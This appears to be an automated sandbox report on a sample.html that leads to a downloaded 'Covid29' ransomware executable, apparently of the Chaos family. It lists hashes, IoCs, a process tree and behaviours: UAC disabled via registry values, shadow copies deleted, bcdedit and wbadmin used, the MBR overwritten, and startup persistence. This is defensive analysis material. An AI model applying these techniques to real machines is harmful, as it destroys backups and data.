Resubmissions
01-07-2024 14:40
240701-r1v34sxang 701-07-2024 14:36
240701-ryzcrawhrb 801-07-2024 14:33
240701-rw6ztazhkp 101-07-2024 14:32
240701-rwkrkszgrj 101-07-2024 14:26
240701-rrv2razfjj 1001-07-2024 14:10
240701-rgwkjawbkh 801-07-2024 14:08
240701-rfsggsyhqn 101-07-2024 14:08
240701-rflzpswapb 101-07-2024 14:06
240701-resqvsyhnk 1Analysis
-
max time kernel
93s -
max time network
208s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
01-07-2024 14:26
Static task
static1
Behavioral task
behavioral1
Sample
sample.html
Resource
win11-20240508-en
General
-
Target
sample.html
-
Size
493KB
-
MD5
937cffd4aed2741d390f12cdaceedfe6
-
SHA1
6e4053037c6fb57b01fb8aadd59f1b4bab4413dd
-
SHA256
23c75e988d1579ade684b8fc3e9ebea0f2d62b955d190c974c4a47112681048a
-
SHA512
8296f202f1538be8425c725e8be4816e692aaec686c89b525c67d2911c4da968047676f3801bed62f7bd95f54d258d775ef42dfa54d93978981c5a4a4e58d444
-
SSDEEP
6144:5DoAwoAwKAwtAwoAwtAw5AwBAw+AwMAwpbQ:5EArADAEALA8AUAaAFAJA2bQ
Malware Config
Signatures
-
Chaos
Ransomware family first seen in June 2021.
-
Chaos Ransomware 3 IoCs
resource yara_rule behavioral1/files/0x0002000000025ca7-476.dat family_chaos behavioral1/memory/2388-480-0x0000000000ED0000-0x0000000000EF0000-memory.dmp family_chaos behavioral1/memory/1320-563-0x0000000000400000-0x00000000005D5000-memory.dmp family_chaos -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2144 bcdedit.exe 3316 bcdedit.exe -
pid Process 292 wbadmin.exe -
Disables Task Manager via registry modification
-
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt svchost.exe -
Executes dropped EXE 4 IoCs
pid Process 788 mbr.exe 2388 Cov29Cry.exe 1004 svchost.exe 5256 Cov29LockScreen.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/1320-438-0x0000000000400000-0x00000000005D5000-memory.dmp upx behavioral1/memory/1320-563-0x0000000000400000-0x00000000005D5000-memory.dmp upx -
Drops desktop.ini file(s) 34 IoCs
description ioc Process File opened for modification C:\Users\Admin\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini svchost.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3107365284-1576850094-161165143-1000\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Searches\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini svchost.exe File opened for modification C:\Users\Public\Pictures\desktop.ini svchost.exe File opened for modification C:\Users\Public\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Public\Documents\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini svchost.exe File opened for modification C:\Users\Public\Videos\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Links\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini svchost.exe File opened for modification C:\Users\Public\Music\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini svchost.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini svchost.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini svchost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 5 raw.githubusercontent.com 54 raw.githubusercontent.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 mbr.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\xoq5fc8kk.jpg" svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4888 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 5220 taskkill.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3107365284-1576850094-161165143-1000\{E23E63B3-5E50-4AD9-9C81-22F1998143BF} msedge.exe Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings svchost.exe -
Modifies registry key 1 TTPs 7 IoCs
pid Process 1444 reg.exe 764 reg.exe 2160 reg.exe 4580 reg.exe 1468 reg.exe 5112 reg.exe 3116 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Covid29 Ransomware.zip:Zone.Identifier msedge.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 3188 PING.EXE 2888 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1004 svchost.exe -
Suspicious behavior: EnumeratesProcesses 55 IoCs
pid Process 2040 msedge.exe 2040 msedge.exe 816 msedge.exe 816 msedge.exe 3112 msedge.exe 3112 msedge.exe 3188 msedge.exe 3188 msedge.exe 432 identity_helper.exe 432 identity_helper.exe 684 msedge.exe 684 msedge.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 2388 Cov29Cry.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe 1004 svchost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
pid Process 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe -
Suspicious use of AdjustPrivilegeToken 53 IoCs
description pid Process Token: SeDebugPrivilege 2388 Cov29Cry.exe Token: SeShutdownPrivilege 4508 shutdown.exe Token: SeRemoteShutdownPrivilege 4508 shutdown.exe Token: SeDebugPrivilege 1004 svchost.exe Token: SeBackupPrivilege 4652 vssvc.exe Token: SeRestorePrivilege 4652 vssvc.exe Token: SeAuditPrivilege 4652 vssvc.exe Token: SeIncreaseQuotaPrivilege 2052 WMIC.exe Token: SeSecurityPrivilege 2052 WMIC.exe Token: SeTakeOwnershipPrivilege 2052 WMIC.exe Token: SeLoadDriverPrivilege 2052 WMIC.exe Token: SeSystemProfilePrivilege 2052 WMIC.exe Token: SeSystemtimePrivilege 2052 WMIC.exe Token: SeProfSingleProcessPrivilege 2052 WMIC.exe Token: SeIncBasePriorityPrivilege 2052 WMIC.exe Token: SeCreatePagefilePrivilege 2052 WMIC.exe Token: SeBackupPrivilege 2052 WMIC.exe Token: SeRestorePrivilege 2052 WMIC.exe Token: SeShutdownPrivilege 2052 WMIC.exe Token: SeDebugPrivilege 2052 WMIC.exe Token: SeSystemEnvironmentPrivilege 2052 WMIC.exe Token: SeRemoteShutdownPrivilege 2052 WMIC.exe Token: SeUndockPrivilege 2052 WMIC.exe Token: SeManageVolumePrivilege 2052 WMIC.exe Token: 33 2052 WMIC.exe Token: 34 2052 WMIC.exe Token: 35 2052 WMIC.exe Token: 36 2052 WMIC.exe Token: SeIncreaseQuotaPrivilege 2052 WMIC.exe Token: SeSecurityPrivilege 2052 WMIC.exe Token: SeTakeOwnershipPrivilege 2052 WMIC.exe Token: SeLoadDriverPrivilege 2052 WMIC.exe Token: SeSystemProfilePrivilege 2052 WMIC.exe Token: SeSystemtimePrivilege 2052 WMIC.exe Token: SeProfSingleProcessPrivilege 2052 WMIC.exe Token: SeIncBasePriorityPrivilege 2052 WMIC.exe Token: SeCreatePagefilePrivilege 2052 WMIC.exe Token: SeBackupPrivilege 2052 WMIC.exe Token: SeRestorePrivilege 2052 WMIC.exe Token: SeShutdownPrivilege 2052 WMIC.exe Token: SeDebugPrivilege 2052 WMIC.exe Token: SeSystemEnvironmentPrivilege 2052 WMIC.exe Token: SeRemoteShutdownPrivilege 2052 WMIC.exe Token: SeUndockPrivilege 2052 WMIC.exe Token: SeManageVolumePrivilege 2052 WMIC.exe Token: 33 2052 WMIC.exe Token: 34 2052 WMIC.exe Token: 35 2052 WMIC.exe Token: 36 2052 WMIC.exe Token: SeBackupPrivilege 3756 wbengine.exe Token: SeRestorePrivilege 3756 wbengine.exe Token: SeSecurityPrivilege 3756 wbengine.exe Token: SeDebugPrivilege 5220 taskkill.exe -
Suspicious use of FindShellTrayWindow 34 IoCs
pid Process 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe 816 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3328 PickerHost.exe 5256 Cov29LockScreen.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 816 wrote to memory of 2648 816 msedge.exe 77 PID 816 wrote to memory of 2648 816 msedge.exe 77 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 3496 816 msedge.exe 78 PID 816 wrote to memory of 2040 816 msedge.exe 79 PID 816 wrote to memory of 2040 816 msedge.exe 79 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 PID 816 wrote to memory of 4876 816 msedge.exe 80 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\sample.html1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffdb4403cb8,0x7ffdb4403cc8,0x7ffdb4403cd82⤵PID:2648
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:22⤵PID:3496
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2664 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:82⤵PID:4876
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:12⤵PID:1616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:12⤵PID:4652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:12⤵PID:5092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5416 /prefetch:12⤵PID:2164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4784 /prefetch:82⤵PID:4484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5292 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:12⤵PID:2760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:12⤵PID:1492
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5600 /prefetch:12⤵PID:2316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5812 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4124 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:12⤵PID:3152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:12⤵PID:2136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5728 /prefetch:12⤵PID:3712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:12⤵PID:3992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:12⤵PID:4936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,10712782755256744811,4193155362292414433,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4148 /prefetch:82⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
PID:684
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5108
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3852
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2228
-
C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe"C:\Users\Admin\Downloads\Covid29 Ransomware\TrojanRansomCovid29.exe"1⤵PID:1320
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4699.tmp\TrojanRansomCovid29.bat" "2⤵
- Modifies registry class
PID:1772 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4699.tmp\fakeerror.vbs"3⤵PID:2320
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 23⤵
- Runs ping.exe
PID:3188
-
-
